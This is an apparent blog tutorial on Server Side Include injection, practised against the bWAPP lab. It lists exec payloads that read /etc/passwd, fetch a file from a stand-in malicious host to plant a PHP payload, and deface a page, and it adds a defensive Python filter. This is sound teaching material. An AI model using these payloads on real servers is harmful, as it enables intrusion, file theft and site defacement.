Server side include (SSI) Injection


What is Server side include

Before getting into what exactly it is, let me ask you a simple question. Let’s assume that you need to develop an application of 100 pages with dynamic content, and each page must have a header, footer and logo. What would be your answer? How much time would it take to add the header and footer to all the pages?

Here comes the feature called Server Side Include (SSI). This is a time-saving feature used for developing applications with dynamic web content. To answer the question above: to insert the header and footer in all pages throughout the website, we can use the simple command ‘#include’, which inserts one file into another. If we need to change anything in the header, we only need to modify the code in one single file. Web pages that contain SSIs often end with a .shtml extension, which tells the server that those pages need to be processed.

syntax:

<!--#command key="value"-->

Yes, this looks like a comment in HTML/XML, but it’s not! SSI varies from server to server (Linux to Windows). I am sharing a few examples for servers which are Linux based.
Real-world uses of SSI include displaying server-specific information such as the current server time, the visitor’s IP address and the document type.
Examples:

<!--#config timefmt="%A %d %B, %Y" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="LAST_MODIFIED"-->

Server side include Injection

Since you already know about HTML injection, let’s now see what SSI injection is and what its impact is. From the introduction above, you know that SSI is a useful, time-saving, reusable component. Yes, I do agree with you. But what if your application falls into the wrong hands? What could happen? It’s something beyond your imagination. Do you want to know what we could do if the web server permits SSI execution without proper validation?

Now it’s time to launch the bee-box server. Log in to bWAPP and select SSI injection. You should see two input fields: first name and last name.

Submit the form (POST) with some valid data and notice the behavior. You should see your IP address in the web page.

How does this application know about your IP address? Okay, let’s check the source code, buddy.

So the code in the page source is used to display the IP address of the user. Now let’s try to inject something and see whether we can grab some sensitive data.
Here are a few commands:

<!--#echo var="DATE_LOCAL"-->
<!--#exec cmd="ls -al"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#echo var="DOCUMENT_URI" -->
<!--#exec cmd="wget http://maliciousSite.com/payload.txt | rename payload.txt payload.php" -->

On injecting one of the above commands, I could see the data in /etc/passwd.

We can also deface the web page with a simple command:

<!--#exec cmd="echo 'You are hacked!' > /var/www/bWAPP/documents/bee_ssii.htm" -->

Now browse to the URL http://yourIPAddress/bWAPP/documents/bee_ssii.htm
You should see the defaced page. This is nothing but website defacement, which ruins your reputation.
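
The defensive side of the payloads above, as an added example that is not part of the original post or of bWAPP's code: it finds SSI directives in submitted form fields using the <!--#command key="value"--> syntax and HTML-encodes each value so the server's SSI parser never sees a directive. The function names, field names and risk tiers are assumptions made for the illustration.

```python
import html
import re

# Directive shape from the article: <!--#command key="value" -->
DIRECTIVE_RE = re.compile(r'<!--#(\w+)(.*?)-->', re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
# Assumed risk tiers: these commands run programs or pull in files.
HIGH_RISK = {"exec", "include"}


def find_directives(value):
    """Return (command, attrs, risk) for each SSI directive found in value."""
    found = []
    for match in DIRECTIVE_RE.finditer(value):
        command = match.group(1).lower()
        attrs = dict(ATTR_RE.findall(match.group(2)))
        risk = "high" if command in HIGH_RISK else "medium"
        found.append((command, attrs, risk))
    return found


def neutralize(value):
    """HTML-encode the value so '<!--#' cannot reach the SSI parser intact."""
    return html.escape(value, quote=True)


def screen_form(fields):
    """Report directives per field and return the encoded, safe-to-store values."""
    report, safe = [], {}
    for name, value in fields.items():
        for command, attrs, risk in find_directives(value):
            report.append({"field": name, "command": command,
                           "attrs": attrs, "risk": risk})
        safe[name] = neutralize(value)
    return report, safe


# Constructed sample submission reusing payloads quoted in the article.
SAMPLE = {
    "firstname": '<!--#echo var="DATE_LOCAL"-->',
    "lastname": 'Bee <!--#exec cmd="cat /etc/passwd"-->',
}

if __name__ == "__main__":
    hits, cleaned = screen_form(SAMPLE)
    for hit in hits:
        print(hit)        # one line per directive, for logging or alerting
    print(cleaned)        # encoded values to write into the page
```

On Apache httpd, serving such pages with Options IncludesNOEXEC instead of Includes keeps SSI available but disables the exec directive.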

So, this is all about server side include injection. If I missed anything, please feel free to post comments below.

DISCLAIMER: THE INFORMATION PUBLISHED IN THIS ARTICLE IS FOR EDUCATIONAL PURPOSE ONLY. ANY MISUSE OF THIS INFORMATION WILL NOT BE THE RESPONSIBILITY OF THE AUTHOR OF THE WEBSITE. THIS IS JUST MY LEARNING EXPERIENCE AND EDUCATIONAL BLOG FOR PEOPLE WHO WOULD LEARN FROM MY EXPERIENCE

3 thoughts on “Server side include (SSI) Injection”

  1. Michael April 2, 2017 / 1:21 am

    Excellent writing. It would be great if you also provide the prevention methods
